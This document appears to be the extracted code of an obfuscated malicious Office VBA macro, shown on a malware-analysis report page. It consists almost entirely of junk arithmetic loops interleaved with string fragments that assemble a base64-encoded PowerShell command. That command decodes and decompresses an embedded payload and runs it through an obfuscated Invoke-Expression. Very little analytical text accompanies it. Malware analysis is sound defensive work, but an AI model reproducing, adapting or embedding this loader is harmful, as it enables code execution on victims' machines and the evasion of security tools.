XnYosC = "wAFQALwBI" + "AG8A" + "TQB5AHUA" + "dA" + "BZ" + "AEcAZgBa" + "AHYANgBJAEM"
For oXzVSp = zbvuDN To VGNqw
      For OCzTNb = Xkiknz To 67453
         HTmZVp = (29511 / CBool(VtokoH) - jTdLYl / Oct(45329 / Hex(58965) / rLaOz + Rnd(HFiWO / Fix(37))))
Next
   aRcuzW = 57165 - 49193
Next
nWCiPp = "AWgBYAG" + "EAagBxAE4ARwBrA" + "DMAMQByAE4A" + "dQBLAEUAWgBFA" + "G0AdA" + "ArAHgA" + "SQBWAE8AR" + "gBkAFg" + "ANAA5AFMATAB" + "6AE8ASwB0AGsA"
For rqQoz = JmKtj To ihKOAi
      For liFRt = FBBRY To 28261
         FiAVKa = (99270 / CBool(wTTciz) - kSjwoS / Oct(76162 / Hex(81588) / YXfrOI + Rnd(lfpjv / Fix(37))))
Next
   oDaiRn = 29826 - 72592
Next
OQNEYMC = "cQBRAG0A" + "bQA2AH" + "IAV" + "QBCAEsAMAB" + "KAE8AbQBMAEIARw" + "A3A" + "DkAYQBLAHYAQwAv"
For OKKRjk = abRsO To nuHfpw
      For zpOACd = YFBzaz To 69104
         UhzZk = (23018 / CBool(OSDSs) - famwR / Oct(7231 / Hex(82560) / wJPGI + Rnd(UZRRP / Fix(37))))
Next
   iZahQ = 27269 - 42356
Next
VzLVHvUaYCP = "AFIAY" + "wB0ADcAZgBrAEM" + "ATwBJAGQANQB1A" + "FAAdwBBAD0AJwA" + "gACkALABbAEk" + "AbwAuAGM" + "ATwBNAHAA" + "UgBlA" + "HMAUwBJAE" + "8AbgAuAEM"
For avwkkL = fPBJvt To YXiSbK
      For oAmDfm = AEhDh To 96341
         ANiVwH = (79204 / CBool(QHTTv) - CzzmL / Oct(15551 / Hex(74259) / KjFZoi + Rnd(UGOul / Fix(37))))
Next
   KDziD = 91469 - 56557
Next
ovIEkpUl = "ATwBtAFA" + "AcgBFAFMAcwB" + "pAG8ATgBt" + "AG8AZABFAF0AOg" + "A6AEQARQBDAG8A" + "TQBQAHIARQ" + "BT"
For ijLrDz = jQWqL To DwPXT
      For AwAFY = iswAI To 15166
         JKfzt = (66368 / CBool(jGkqrE) - RHFiH / Oct(68805 / Hex(70846) / odimhZ + Rnd(HjIOd / Fix(37))))
Next
   uXAVo = 67938 - 58126
Next
FuTOLm = "AFMAKQAgAHwAI" + "ABm" + "AG8AcgB" + "lAGEAQwBoAC0Ab" + "wBiAEoAZQBD" + "AFQAIAB7"
For LKNTkM = rSBYbf To CTHBK
      For zAicbW = jEMSA To 12727
         cTQSwN = (39196 / CBool(RGqBW) - VhOnY / Oct(6379 / Hex(89016) / clsNp + Rnd(nFiXV / Fix(37))))
Next
   ujDoEz = 12564 - 68500
Next
JJbAujuOzYB = "ACAAb" + "gBlAH" + "cALQBvAGIASgB" + "lAE" + "MAVAAgAHMAeQBz" + "AHQAZQBtAC4A" + "SQBvAC4AUw" + "B0AFIARQBhA" + "G0AcgBFAEE" + "AZA"
For bmZAzO = zibDp To qfajX
      For cLXSj = cliaib To 93814
         bAwSN = (80934 / CBool(QIEvRG) - sYOVZn / Oct(14547 / Hex(46331) / TsZWc + Rnd(XvAGiq / Fix(37))))
Next
   jHVhjL = 6260 - 37771
Next
PcEzMLiki = "BFAFIAKAA" + "kAF8ALABbAFQA" + "RQBY" + "AHQALgBlAG" + "4AYwBPAEQASQ" + "BOAGcAXQA6A" + "DoAYQBTAE" + "MASQ" + "BJACAAKQA"
For OUztG = NBJDD To fanTJX
      For IvLbnB = GzsGvU To 68756
         dEXjmK = (65457 / CBool(zbmsAh) - NXnSKb / Oct(7193 / Hex(87396) / rOFOI + Rnd(HiNjw / Fix(37))))
Next
   walaaw = 27035 - 98684
Next
ABLMP = "gAH0AIAB8AE" + "YAbwBSAEUAQQB" + "DA" + "EgALQBPAEI" + "ASgBl" + "AGMAdAAgAHsAJAB" + "fAC4AUgBl" + "AEEARAB0AG8A"
For JrZRi = ICYUaL To rYFTq
      For UEfRkw = wCskf To 80157
         LiWfwi = (35959 / CBool(foOWXl) - MUGFTi / Oct(91704 / Hex(57943) / pSNnF + Rnd(opkRz / Fix(37))))
Next
   BZXMc = 41607 - 48036
Next
TfUHKBvFl = "RQ" + "BuAGQAKAApACA" + "AfQApACAAfAAm" + "ACAAKAAgACQ" + "Acw" + "BIAGUATAB"
PEKJv = XnYosC + nWCiPp + OQNEYMC + VzLVHvUaYCP + ovIEkpUl + FuTOLm + JJbAujuOzYB + PcEzMLiki + ABLMP + TfUHKBvFl
End Function
Function fUNKDmHphqP()
On Error Resume Next
For DOajNq = dZWPQ To zqdRf
      For VAYlGm = LujtrI To 43674
         WasjaO = (74598 / CBool(QOBjE) - juvwb / Oct(7199 / Hex(80980) / cTumid + Rnd(jiGtQa / Fix(37))))
Next
   lkFii = 79002 - 16663
Next
risDmJjUNQ = "sAGkARA" + "BbADEAXQAr" + "ACQAUwBIAEU" + "ATABMAEkAZABbA" + "DEAMwB" + "dACsAJwB4A" + "CcAKQA="
fUNKDmHphqP = risDmJjUNQ
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.